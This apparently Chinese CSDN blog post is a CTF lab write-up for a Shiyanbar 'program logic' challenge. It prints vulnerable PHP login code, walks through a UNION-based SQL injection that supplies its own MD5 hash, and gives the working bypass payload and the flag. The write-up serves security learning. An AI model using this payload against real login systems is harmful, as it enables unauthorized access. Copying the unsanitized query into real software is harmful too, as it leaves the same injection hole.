实验吧-程序逻辑问题

最新推荐文章于 2019-07-16 20:50:58 发布
最新推荐文章于 2019-07-16 20:50:58 发布
阅读量221 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingchenldl/article/details/84576453
版权

程序逻辑问题

原题链接

分析

查看源码有个index.txt

<?php


if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********, "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
//strcasecmp — 二进制安全比较字符串(不区分大小写)
//和strcmp不同,这里没法通过php弱类型绕过
    echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
    
  }

上面这段代码的逻辑是这样的:

  1. 获取user的那一行数据。
  2. 把user哪一行数据的pw列,md5运算后,与提交的pass数据做比较,相等就输出flag。

这里提交的pass,我们可控,只要能查出一个pw就行,无所谓是谁的pw

就是说user其实无所谓是哪个,无所谓知不知道,只要利用user提交sql注入语句查到一个md5(pw)
且于提交的md5(pass)相等就行。

可以本地做个测试,更清楚的说明这个问题:

mysql> select * from user;
+----------+-----+------------+
| Username | Age | Password   |
+----------+-----+------------+
| olivia   |  18 | slimslim   |
| qingchen |  18 | meimima123 |
| hack     |   1 | love_pwn   |
| someome  |   3 | p@55w0rd   |
+----------+-----+------------+
4 rows in set (0.00 sec)

mysql> select password from user where username='hack' union select md5(1);
+----------------------------------+
| password                         |
+----------------------------------+
| love_pwn                         |
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
2 rows in set (0.00 sec)

mysql> select password from user where username='xman' union select md5(1);
+----------------------------------+
| password                         |
+----------------------------------+
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
1 row in set (0.00 sec)

于是有了payload:

user=wobuxiwnagyouzhegeren' union select md5(123)#&pass=123

结果:
Logged in! Key: SimCTF{youhaocongming}

flag

SimCTF{youhaocongming}

知识点

代码审计
sql注入

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧-web-程序逻辑问题
a3uRa的一个窝
08-29 358
代码index.txt 发现源码 &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; welcome to simplexue &amp;lt;/head&amp;gt; &amp;lt;body&amp;gt; &amp;lt;?php if($_POST[user] &amp;amp;&amp;amp; $_POST[pass]) { $conn = mysql_conn
决斗场 - 实验吧 WEB 程序逻辑问题
RaAlGhul的博客
12-21 604
题目链接:http://www.shiyanbar.com/ctf/62 点开题目链接,发现是一个类似于登陆的界面: 首先以之前的一道题:登陆一下好吗??的思路,猜测后台代码为: select * from user where username='str' and password='pastr' 我们在username和password上都输入 a'='
实验吧--程序逻辑问题
weixin_43803070的博客
07-16 183
看了一下实验吧的题,说是程序逻辑问题,一开始没找到源码,打开源码之后审计: <html> <head> welcome to simplexue </head> <body> <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, ...
实验吧-程序逻辑问题writeup
一个安全研究员
08-27 9446
1.      程序逻辑问题   题目提示是程序逻辑问题,那一定涉及到源码审计嘛,F12查看网页源代码:       这儿不就藏着源码吗,构造URL访问index.txt的如下源码: &lt;html&gt; &lt;head&gt; welcome to simplexue &lt;/head&gt; &lt;body&gt; &lt;?php     if($_P...
万能逻辑电路实验-综合文档
05-23
每个例子都可能包含程序代码、电路设计实验步骤以及预期结果分析,帮助学习者逐步掌握单片机编程和逻辑电路设计。 "017、万能逻辑电路实验"可能是该系列实验中的第17个,可能涉及更高级或特定的逻辑电路设计,如...
程序设计基础实验-教学大纲.docx
12-16
实验三和四分别讲解顺序结构和选择结构,训练学生使用赋值语句、算术运算符、逻辑运算符、if语句和switch语句;实验五则关注循环结构,涵盖while、do-while和for等循环语句的运用。 这些实验设计旨在逐步引导学生从...
S7-200实验程序.rar
08-30
标题中的"S7-200实验程序"指的是西门子S7-200系列PLC(可编程逻辑控制器)的实验程序。S7-200是西门子推出的一款小型PLC,适用于各种自动化控制应用,尤其是工业生产环境中的简单控制任务。这个实验程序可能是...
51单片机源码程序-万能逻辑电路实验.zip
05-11
【51单片机源码程序-万能逻辑电路实验】是一个针对初学者和专业开发者提供的资源包,其中包含了51系列单片机的源代码和相关实验设计,旨在帮助学习者深入理解单片机的工作原理及编程技巧。51单片机是微控制器领域...
MCS-51单片机实验程序.doc
11-26
MCS-51单片机是一种广泛应用的微控制器,它基于Intel 8051内核,具有丰富的I/O端口和内置RAM、ROM。...通过这些实验,学习者可以深入理解MCS-51单片机的软件编程和硬件控制,掌握基本的数字逻辑和控制流程。
西普实验吧ctf-web-程序逻辑问题(代码审计)
烟敛寒林的博客
12-27 408
题目地址:http://ctf5.shiyanbar.com/web/5/index.php 查看页面源代码,发现index.txt隐藏文件 又是一道代码审计的题目: if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_...
程序逻辑问题--实验
Gunther的博客
09-01 5013
程序逻辑问题 题目提示是绕过,本题考点:sql语句注入 <?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database
实验吧CTF刷题记录(web篇)
sinat_21923549的博客
03-10 8681
1.这个看起来有点简单 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 手工检测是否存在sql注入 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 2.程序员的问题 解题链接: http://ctf5.shiyanbar.com/web/4/index
CTF实验吧-WEB专题-5
qq_18661257的专栏
12-22 6020
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
实验吧——WriteUp&&涨姿势(4)
困难是否磨灭你的自信
05-26 1753
WriteUp 最安全的管理系统 认真你就输了 so beautiful so white 涨姿势 程序逻辑问题 FALSE
基于Springboot的在线英语阅读平台的设计与实现论文
最新发布
07-16
传统方式管理信息存在诸多不足,如耗时较长、数据错误率高、错误数据更正困难以及数据检索繁琐费力。因此,通过在计算机上部署在线英语阅读分级平台软件,可以充分发挥其高效的信息处理能力,从而规范信息管理流程,使管理工作更加系统化和程序化。同时,该平台的有效应用还能助力管理人员准确快速地处理信息。 在开发工具的选择上,在线英语阅读分级平台经过慎重考虑,为便于开发实现,选用了IDEA作为开发工具,并采用Mysql作为数据库工具。以此为基础搭建开发环境,实现在线英语阅读分级平台的各项功能,包括管理员对用户和新闻公告的管理。 作为一款基于软件开发技术设计实现的应用系统,在线英语阅读分级平台在信息处理方面表现出色,无论是数据添加、数据维护和统计,还是数据查询等处理需求,该平台都能轻松应对。
关于红外传感器的计数器设计.docx
07-16
传感器
中国航空研究院609研究所考研10个学院,38个专业课历年考真题及答案汇总整理,备考资料题库视频.pdf
07-16
中国航空研究院609研究所考研10个学院,38个专业课历年考真题及答案汇总整理,备考资料题库视频.pdf
实验7-微程序控制器实验
06-18
实验7-微程序控制器实验通常是在计算机体系结构或嵌入式系统课程中的一部分,它涉及到对微程序设计和控制原理的实际操作。微程序控制器是一种使用微程序来执行指令的处理器架构,它将复杂的操作分解成一系列简单的微...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值